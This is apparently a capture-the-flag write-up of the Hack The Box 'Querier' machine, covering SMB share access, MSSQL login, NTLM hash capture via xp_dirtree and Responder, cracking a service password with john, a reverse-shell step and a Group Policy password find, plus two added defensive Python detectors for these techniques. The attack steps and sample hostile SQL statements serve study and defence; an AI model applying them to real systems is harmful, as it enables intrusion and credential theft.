Hey guys, today Querier retired and here's my write-up about it. It was a great Windows machine covering some interesting stuff and I enjoyed it. I wrote two posts for this machine: the first one solving it with Kali and the other one solving it with Commando VM; you can find the second post here. It's a Windows box and its IP is 10.10.10.125, which I added to /etc/hosts as querier.htb. Let's jump right in!
As always, we start with nmap to scan for open ports and services: nmap -sV -sT -sC querier.htb
We got SMB and an MSSQL server on port 1433. Let's check SMB first.
We need to list the shares. I used smbclient:
```
smbclient --list //querier.htb/ -U ""
Enter WORKGROUP\'s password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Reports         Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to querier.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
```
Obviously, if there's an anonymously accessible share it will be Reports. Let's see what's in there:
```
root@kali:~/Desktop/HTB/boxes/querier# smbclient //querier.htb/Reports/ -U ""
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 28 18:23:48 2019
  ..                                  D        0  Mon Jan 28 18:23:48 2019
  Currency Volume Report.xlsm         A    12229  Sun Jan 27 17:21:34 2019

                6469119 blocks of size 4096. 1608855 blocks available
```
Only one file: a macro-enabled Excel workbook (.xlsm).
```
smb: \> get "Currency Volume Report.xlsm"
getting file \Currency Volume Report.xlsm of size 12229 as Currency Volume Report.xlsm (17.1 KiloBytes/sec) (average 17.1 KiloBytes/sec)
smb: \>
```
```
Password:
[*] Encryption required, switching to TLS
[-] ERROR(QUERIER): Line 1: Login failed for user 'reporting'.
```
I added the Windows authentication option (-windows-auth) and it worked:
Unfortunately, enabling xp_cmdshell was denied; the reporting user is not allowed to change the server configuration:
```
SQL> enable_xp_cmdshell
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(QUERIER): Line 105: User does not have permission to perform this action.
[-] ERROR(QUERIER): Line 1: You do not have permission to run the RECONFIGURE statement.
```
I ran Responder (responder -I tun0) and used xp_dirtree to see what hashes I could catch. Asking the SQL Server to list a UNC path on my machine makes its service account authenticate to Responder's SMB listener:
And we got the NTLMv2 hash for mssql-svc. I used john with the rockyou wordlist to crack it:
```
root@kali:~/Desktop/HTB/boxes/querier# john --wordlist=/usr/share/wordlists/rockyou.txt mssql-svc.hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
corporate568     (mssql-svc)
1g 0:00:00:07 DONE (2019-06-21 07:41) 0.1321g/s 1184Kp/s 1184Kc/s 1184KC/s correforenz..corby909
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
```
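From the defender's side, both steps above (the attempt to enable xp_cmdshell and the xp_dirtree call that made the service account authenticate outbound) leave a clear trace in SQL Server statement auditing. The following is an added example, not code from the original write-up: a small detector that runs over constructed audit lines in a `timestamp|login|client_ip|statement` format (the format, the `ALLOWED_UNC_HOSTS` allowlist and the sample IPs are assumptions) and flags extended stored procedures that take a UNC path to an unapproved host, plus any use of xp_cmdshell.

```python
import re
from dataclasses import dataclass

# Hypothetical allowlist: file servers this SQL Server is expected to reach over SMB.
ALLOWED_UNC_HOSTS = {"fileserver01"}

# Extended stored procedures that make the SQL Server service account open an
# outbound SMB connection (NTLM authentication included) to the host named in
# the UNC path argument. Group 1 = procedure, group 2 = the UNC path.
UNC_PROC = re.compile(
    r"\b(xp_dirtree|xp_fileexist|xp_subdirs)\b[^'\\]*'?(\\\\[^'\s]+)", re.IGNORECASE
)
CMDSHELL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)
CONFIGURE = re.compile(r"\bsp_configure\b", re.IGNORECASE)


@dataclass
class Finding:
    login: str
    client: str
    rule: str
    detail: str


def parse_line(line):
    """Split one constructed audit line into (timestamp, login, client_ip, statement)."""
    ts, login, client, stmt = line.split("|", 3)
    return ts, login, client, stmt


def analyze(lines):
    """Return a Finding per suspicious statement, in log order."""
    findings = []
    for line in lines:
        _, login, client, stmt = parse_line(line)

        m = UNC_PROC.search(stmt)
        if m:
            unc = m.group(2)
            host = unc.split("\\")[2]  # \\host\share -> host
            if host not in ALLOWED_UNC_HOSTS:
                findings.append(Finding(
                    login, client, "ntlm_coercion",
                    f"{m.group(1)} to unapproved host {host} ({unc})"))

        if CMDSHELL.search(stmt):
            # sp_configure 'xp_cmdshell' is the enable step; anything else is execution.
            rule = "xp_cmdshell_enable" if CONFIGURE.search(stmt) else "xp_cmdshell_exec"
            findings.append(Finding(login, client, rule, stmt.strip()))
    return findings


# Constructed sample log: the sequence seen in the write-up, plus one legitimate
# xp_dirtree against an approved file server that must not be flagged.
SAMPLE_LOG = [
    "2019-06-21T07:30:01|reporting|10.10.14.5|SELECT name FROM sys.databases",
    "2019-06-21T07:31:12|reporting|10.10.14.5|EXEC sp_configure 'show advanced options', 1",
    "2019-06-21T07:31:13|reporting|10.10.14.5|RECONFIGURE",
    "2019-06-21T07:31:14|reporting|10.10.14.5|EXEC sp_configure 'xp_cmdshell', 1",
    r"2019-06-21T07:35:40|reporting|10.10.14.5|EXEC master..xp_dirtree '\\10.10.14.5\share', 1, 1",
    r"2019-06-21T07:40:00|svc_backup|10.10.10.20|EXEC master..xp_dirtree '\\fileserver01\backups', 1, 1",
    "2019-06-21T07:45:00|mssql-svc|10.10.14.5|EXEC xp_cmdshell 'whoami'",
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"[{f.rule}] login={f.login} client={f.client}: {f.detail}")
```

Running it prints three findings: the xp_cmdshell enable attempt, the xp_dirtree call towards the unapproved host, and the later xp_cmdshell execution; the backup job's xp_dirtree against the allowlisted file server is silently accepted. In a real deployment the `sp_configure 'show advanced options'` and `RECONFIGURE` statements from a non-admin login are worth correlating with the enable attempt as well.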
Now it’s time to enable xp_cmdshell and get a reverse shell.
We have RCE. I ran a Python HTTP server to host nc.exe, then used Invoke-WebRequest on the box to download it:
One of the things to check when enumerating Windows machines is Group Policy Preferences passwords (the cpassword attribute in policy XML files), which happened to be the privilege escalation vector here. I checked group policy passwords and found Administrator's password:
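A defender can audit for the same artifact before an attacker does. The following is an added example, not code from the write-up: a scanner that walks Group Policy Preference XML files (Groups.xml, ScheduledTasks.xml, Services.xml and the like) and reports every element that still carries a non-empty cpassword attribute, without decrypting anything. The SYSVOL paths, the GUID placeholder, the account names and the cpassword values in the sample files are constructed, and the `scan_sysvol_dir` helper assumes a locally mounted copy of SYSVOL.

```python
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Attributes that name the account a GPP item applies to, by item type
# (local users, scheduled tasks, services).
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")


@dataclass
class GppFinding:
    path: str
    element: str
    account: str
    cpassword_len: int


def scan_gpp_xml(path, content):
    """Return one GppFinding per element in this file that stores a cpassword."""
    findings = []
    try:
        root = ET.fromstring(content)
    except ET.ParseError:
        return findings  # not well-formed XML: nothing to extract, caller may log it
    for el in root.iter():
        cp = el.get("cpassword")
        if not cp:  # attribute absent or empty: no password stored on this item
            continue
        account = next((el.get(a) for a in ACCOUNT_ATTRS if el.get(a)), "<unknown>")
        findings.append(GppFinding(path, el.tag, account, len(cp)))
    return findings


def scan_sysvol(files):
    """Scan an in-memory {path: content} mapping; only .xml files are considered."""
    out = []
    for path, content in files.items():
        if path.lower().endswith(".xml"):
            out.extend(scan_gpp_xml(path, content))
    return out


def scan_sysvol_dir(root_dir):
    """Same scan over a mounted SYSVOL directory tree (hypothetical usage)."""
    files = {}
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if name.lower().endswith(".xml"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    files[full] = fh.read()
    return scan_sysvol(files)


# Constructed sample SYSVOL contents (GUID and cpassword values are placeholders).
POLICY = r"\\example.local\SYSVOL\example.local\Policies\{GUID-PLACEHOLDER}"
SAMPLE_FILES = {
    POLICY + r"\Machine\Preferences\Groups\Groups.xml": (
        '<Groups>'
        '<User name="Administrator" image="2">'
        '<Properties action="U" newName="" fullName="" description="" '
        'cpassword="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=" '
        'changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Administrator"/>'
        '</User></Groups>'
    ),
    POLICY + r"\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml": (
        '<ScheduledTasks><Task name="Nightly Export">'
        '<Properties action="C" runAs="EXAMPLE\\svc_task" cpassword="BBBBBBBBBBBBBBBBBBBBBBBB=" '
        'appName="C:\\export.exe"/>'
        '</Task></ScheduledTasks>'
    ),
    # Service item configured without a stored password: must not be reported.
    POLICY + r"\Machine\Preferences\Services\Services.xml": (
        '<NTServices><NTService name="Spooler">'
        '<Properties startupType="AUTOMATIC" serviceName="Spooler" accountName="" cpassword=""/>'
        '</NTService></NTServices>'
    ),
    POLICY + r"\GPT.INI": "[General]\nVersion=1\n",
}

if __name__ == "__main__":
    for f in scan_sysvol(SAMPLE_FILES):
        print(f"{f.path}: <{f.element}> account={f.account} cpassword_len={f.cpassword_len}")
```

The check deliberately stops at reporting presence and length: the remediation is to delete the preference item (or recreate it without a password) and rotate the affected account, so decryption adds nothing for the defender.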